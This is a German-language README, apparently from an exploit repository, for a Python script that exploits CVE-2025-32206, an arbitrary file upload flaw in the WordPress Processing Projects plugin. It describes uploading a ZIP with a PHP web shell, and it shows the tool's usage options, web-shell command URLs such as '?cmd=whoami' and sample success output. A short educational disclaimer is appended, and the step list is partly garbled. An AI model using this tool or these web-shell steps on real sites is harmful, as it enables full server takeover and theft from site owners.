
WordPress Processing Projects Plugin <= 1.0.2 ist anfällig für beliebigen Datei-Upload
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H„Die Schwachstelle „Uneingeschränkter Upload einer Datei mit gefährlichem Typ“ in LABCAT Processing Projects ermöglicht es Angreifern, eine Web-Shell auf einen Webserver hochzuladen. Dies kann zu einer vollständigen Kompromittierung führen."
Dieses Python-Exploit-Skript zielt auf WordPress-Seiten ab, die das anfällige Processing Projects-Plugin (Version <= 1.0.2) verwenden. Das Plugin verarbeitet Datei-Uploads von authentifizierten Benutzern nicht ordnungsgemäß und ermöglicht das Hochladen beliebiger ZIP-Dateien, die ausführbaren PHP-Code (Web-Shells) enthalten.
Das Exploit-Skript:
Nxploited.zip), die eine bösartige PHP-Shell (Nxploit.php) enthält.http://target.com/wp-content/uploads/processing-projects/Nxploit.phpSobald die Shell erfolgreich hochgeladen wurde, kann sie verwendet werden, um Systembefehle über den Parameter cmd auszuführen. Beispiele:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
Diese Shell führt beliebige Betriebssystembefehle aus und gibt deren Ausgabe direkt in der Antwort zurück.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | Von Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Ziel-WordPress-URL (z. B. http://target.com/wordpress)
-un, --username USERNAME WordPress-Admin-Benutzername
-p, --password PASSWORD WordPress-Admin-Passwort
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
Dieses Skript wird ausschließlich zu Bildungszwecken bereitgestellt. Die unbefugte Nutzung dieses Exploits auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
Halten Sie sich stets an verantwortungsvolle Offenlegungspraktiken und verwenden Sie dieses Tool nur in kontrollierten Umgebungen oder mit ausdrücklicher Genehmigung.
Von: Nxploited | Khaled Alenazi